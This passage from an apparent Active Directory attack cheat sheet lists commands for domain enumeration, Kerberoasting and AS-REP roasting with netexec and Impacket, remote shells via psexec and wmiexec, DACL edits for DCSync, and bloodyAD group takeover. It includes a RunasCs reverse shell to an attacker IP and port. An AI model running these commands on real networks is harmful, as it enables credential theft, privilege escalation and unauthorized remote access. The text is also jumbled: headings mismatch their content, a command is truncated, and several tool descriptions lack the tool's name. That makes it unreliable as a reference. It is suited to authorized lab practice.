-Recurse switch tells PowerView that if it finds any groups that are part of the target group (nested group membership) to list out the members of those groups.
Enumerate domain trust mappings
Get-DomainTrustMapping
Test for local admin access on either the current machine or a remote one
This cmdlet will print out any trust relationships the domain has. We can determine if they are trusts within our forest or with domains in other forests, the type of trust, the direction of the trust, and the name of the domain the relationship is with.
Group Enumeration
Get-ADGroup -Filter * | select name
Group Information
Get-ADGroup -Identity "Backup Operators"
Group Membership Listing
Get-ADGroupMember -Identity "Backup Operators"
If part of GMSA_MANAGERS Group, Set yourself as someone who can read the password
sudo netexec ldap DCIP -u USER -p PASS --kerberoasting output.txt
AS_REP version with --asreproast flag
🐧 SMBMap
SMBMap is great for enumerating SMB shares from a Linux attack host. It can be used to gather a listing of shares, permissions, and share contents if accessible.
Impacket is a versatile toolkit that provides us with many different ways to enumerate, interact, and exploit Windows protocols and find the information we need using Python.
Shell on target device (PSExec)
psexec.py <domain/user>:'<password>'@<IP>
Stealthier Shell on target device (wmiexec.py)
A more stealthy approach to execution on hosts than other tools, but would still likely be caught by most modern anti-virus and EDR systems.
wmiexec.py <domain/user>:'<password>'@<IP
Finding ASREProasting targets
No user specification needed
GetNPUsers -dc-ip IP -request 'htb.local/' -format hashcat
Edit DACL to get DCSync
target-dn is the LDAP format, like DC=htb,DC=local
Put the hashes in a file in the user:hash format, for example for NTLM hashes then use the flag --user for automatically make hashcat discard that first column and use the rest as the hash. This allows to use --show to then recover the user of the cracked password from the potfile.
🐧 BloodyAD
Swiss army knife for AD privilege escalation
As other tools, to use NTLM hashes on this put them in the -p password field PRECEDED by a :
Set yourself as owner
bloodyAD --host "DCIP" -d "DOMAIN" -u "YOURACCOUNT" -p ":HASH" set owner GROUP YourAccount
Add user to group (GenericAll over group)
bloodyAD --host DCIP -d DOMAIN -u USER -p 'PASSWORD' add groupMember "GROUP" USER
Useful to adjust the system clock to one of another machine. Solves problem like kerberos Clock skew too great
sudo apt install ntpdate
sudo ntpdate <IP or FQDN>
🪟 Mounting smb share (auth) from command line
net use K: \\IP\share /user:username password
list with
net use
🪟 Refreshing Privileges after privesc without closing and reopening
Useful in occasions when restarting the connection is more annoying than downloading a binary on the machine. Example is when assigning your own user to the administrators group
.\RunasCs.exe USER PASSWORD powershell -r ATTACKERIP:PORT
is a tool that can help us acquire credentials or other sensitive data in an Active Directory environment. Snaffler works by obtaining a list of hosts within the domain and then enumerating those hosts for shares and readable directories. Once that is done, it iterates through any directories readable by our user and hunts for files that could serve to better our position within the assessment. Snaffler requires that it be run from a domain-joined host or in a domain-user context.
is another handy Python script we can use to enumerate users, groups, and computers from a Windows domain by utilizing LDAP queries.
